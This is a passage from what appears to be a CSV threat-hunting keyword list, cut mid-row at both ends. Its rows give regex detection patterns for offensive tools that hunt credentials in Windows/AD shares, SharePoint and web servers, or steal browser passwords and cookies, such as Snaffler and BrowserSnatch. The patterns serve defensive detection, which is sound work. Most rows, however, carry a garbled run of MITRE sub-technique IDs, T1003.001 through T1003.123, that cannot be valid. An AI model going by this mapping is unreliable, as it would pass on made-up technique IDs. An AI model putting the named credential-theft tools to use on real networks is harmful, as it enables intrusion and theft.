T1003.014 - T1003.015 - T1003.016 - T1003.017 
- T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59765" "*SnaffCore/ActiveDirectory*",".{0,1000}SnaffCore\/ActiveDirectory.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - 
T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59766" "*SnaffCore/Classifiers*",".{0,1000}SnaffCore\/Classifiers.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 
- T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59767" "*SnaffCore/Concurrency*",".{0,1000}SnaffCore\/Concurrency.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - 
T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59768" "*SnaffCore/Config*",".{0,1000}SnaffCore\/Config.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - 
T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59769" "*SnaffCore/ShareFind*",".{0,1000}SnaffCore\/ShareFind.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - 
T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59770" "*SnaffCore/TreeWalk*",".{0,1000}SnaffCore\/TreeWalk.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - 
T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59771" "*Snaffler.csproj*",".{0,1000}Snaffler\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59772" "*Snaffler.exe*",".{0,1000}Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59773" "*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - 
T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59774" "*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59775" "*snaffler.log*",".{0,1000}snaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","#logfile","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59776" "*Snaffler.Properties*",".{0,1000}Snaffler\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59777" "*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - 
T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59778" "*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59779" "*Snaffler.SnaffRules*",".{0,1000}Snaffler\.SnaffRules.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59780" "*SnafflerMessage.cs*",".{0,1000}SnafflerMessage\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - 
T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59781" "*SnafflerMessageType.cs*",".{0,1000}SnafflerMessageType\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - 
T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59782" "*SnaffPoint.exe*",".{0,1000}SnaffPoint\.exe.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","59783" "*SnaffPoint-main*",".{0,1000}SnaffPoint\-main.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","59784" "*snallygaster*",".{0,1000}snallygaster.{0,1000}","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/hannob/snallygaster","1","0","N/A","N/A","N/A","10","2085","232","2025-04-15T07:25:09Z","2018-04-10T12:01:16Z","59785" "*Snatching passwords & cookies*",".{0,1000}Snatching\spasswords\s\&\scookies.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers 
